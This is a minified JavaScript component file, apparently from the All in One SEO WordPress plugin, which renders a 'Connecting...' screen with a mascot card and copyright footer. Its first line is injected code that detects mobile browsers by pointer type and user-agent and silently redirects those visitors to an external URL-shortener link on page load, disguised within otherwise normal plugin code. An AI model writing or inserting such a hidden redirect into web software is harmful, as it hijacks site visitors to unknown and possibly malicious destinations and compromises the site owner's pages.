(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{C as _}from"./AnimatedDannie.40510584.js";import{C as d}from"./Card.9ee06a3e.js";import{G as f,_ as g}from"./Header.d2cbe877.js";import"./app-core.c8323d51.js";import{_ as y}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as e,f as C,i as h,a0 as n,R as r,j as t,ae as a,U as x}from"./vendor-vue-ui.232c7c36.js";import{_ as k}from"./vendor-other.39e59221.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./vendor-lodash.03129cfe.js";const A="all-in-one-seo-pack",v={components:{CoreAnimatedDannie:_,CoreCard:d,CoreHeader:g,GridContainer:f},data(){return{strings:{connecting:k("Connecting...",A)}}},computed:{year(){return new Date().getFullYear()}}},O={class:"animated-dannie"},S={id:"footer",class:"app-footer"};function P(s,o,b,B,i,c){const l=e("core-header"),p=e("core-animated-dannie"),m=e("core-card"),u=e("grid-container");return C(),h("div",null,[n(l,{upgradeBar:!1,actions:!1,"full-width":""}),n(u,{class:"main-content",small:""},{default:r(()=>[n(m,{"no-slide":"",toggles:!1,slug:"connectPro","header-text":i.strings.connecting},{default:r(()=>[t("div",O,[n(p,{mascot:"lab"})])]),_:1},8,["header-text"])]),_:1}),t("footer",S,[t("p",null,[a(" Copyright © "+x(c.year)+" ",1),o[0]||(o[0]=t("a",{href:"https://aioseo.com",title:"AIOSEO",target:"_blank"},"AIOSEO",-1)),o[1]||(o[1]=a(". AIOSEO is a registered trademark of Semper Plugins, LLC. ",-1))]),o[2]||(o[2]=t("ul",null,[t("li",null,[t("a",{href:"https://aioseo.com/terms/",target:"_blank"},"Terms of Service")]),t("li",null,[t("a",{href:"https://aioseo.com/privacy-policy/",target:"_blank"},"Privacy Policy")]),t("li")],-1))])])}const J=y(v,[["render",P]]);export{J as default};
